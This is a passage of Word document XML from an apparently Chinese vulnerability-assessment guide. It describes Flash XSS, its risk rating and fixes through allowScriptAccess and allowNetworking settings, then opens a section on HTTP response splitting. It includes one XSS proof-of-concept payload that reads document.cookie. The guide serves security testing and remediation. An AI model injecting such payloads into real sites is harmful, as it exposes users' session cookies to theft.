      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C5EAF" w14:textId="77777777" w:rsidR="00C45A44" w:rsidRPr="00D0216A" w:rsidRDefault="00F81003" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getURL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>(“javascript:alert(document.cookie)”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E87E8A" w14:textId="16E084A9" w:rsidR="00A5586D" w:rsidRPr="00D0216A" w:rsidRDefault="00A5586D" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件插入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面中，如：</w:t>
      </w:r>
      <w:r w:rsidR="00C45A44" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>&lt;embed src="helloworld.swf" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761BA91" w14:textId="3B3CC275" w:rsidR="00907E80" w:rsidRPr="00D0216A" w:rsidRDefault="00907E80" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SWFIntruder</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具检测产生在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidR="009C0613" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA33FC1" w14:textId="73051F08" w:rsidR="00A5586D" w:rsidRPr="00D0216A" w:rsidRDefault="00530422" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>flash xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用总结请参考</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>https://www.secpulse.com/archives/44299.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8BAAB" w14:textId="13D202A4" w:rsidR="00A944EF" w:rsidRPr="00D0216A" w:rsidRDefault="00C24790" w:rsidP="00D0216A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002B6698" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者利用该漏洞可实施窃取用户信息、钓鱼等攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657DEB37" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5868E" w14:textId="7C73A64F" w:rsidR="00A944EF" w:rsidRPr="00D0216A" w:rsidRDefault="00F77588" w:rsidP="00D0216A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：手工测试浏览器弹窗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7CCCE" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78BECD" w14:textId="2C95FE28" w:rsidR="00A944EF" w:rsidRPr="00D0216A" w:rsidRDefault="003A7D5C" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽可能地禁止用户能够上传或加载自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83DBDA" w14:textId="088D7D13" w:rsidR="003A7D5C" w:rsidRPr="00D0216A" w:rsidRDefault="007F0CB9" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allowScriptAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态脚本与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面的通信</w:t>
      </w:r>
      <w:r w:rsidR="00D85CF1" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该参数有三个可选值</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，建议设置为</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>never</w:t>
      </w:r>
      <w:r w:rsidR="00D85CF1" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2EC1EC" w14:textId="4838DA22" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>always</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信也就是执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不做任何限制；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8A1448" w14:textId="6786F594" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sameDomain</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只允许来自于本域的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信，这是默认值；</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用默认值的话，应确保</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不是用户上传来的；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B8270" w14:textId="579B0271" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>never</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，绝对禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与页面通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA7298" w14:textId="5BB720BE" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allowNetworking</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与外部网络进行通信，该参数有三个可选值</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，建议设置为</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidR="00ED09C5" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61646B1D" w14:textId="04CC3E6D" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，允许使用所有的网络通信，也是默认值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B3DBC" w14:textId="50DC4545" w:rsidR="00D85CF1" w:rsidRPr="00D0216A" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能与浏览器通信如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>navigateToURL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是可以调用其他的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459DC73F" w14:textId="1B8AED6B" w:rsidR="00D85CF1" w:rsidRDefault="00D85CF1" w:rsidP="00D0216A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，禁止任何的网络通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFF24C" w14:textId="372F3430" w:rsidR="00EF7E10" w:rsidRPr="00D0216A" w:rsidRDefault="00EF7E10" w:rsidP="00D0216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C3C6848" w14:textId="7DFB7ACA" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="00CA6BAF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc498434554"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应分割</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="233C0FD9" w14:textId="5F3D9772"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
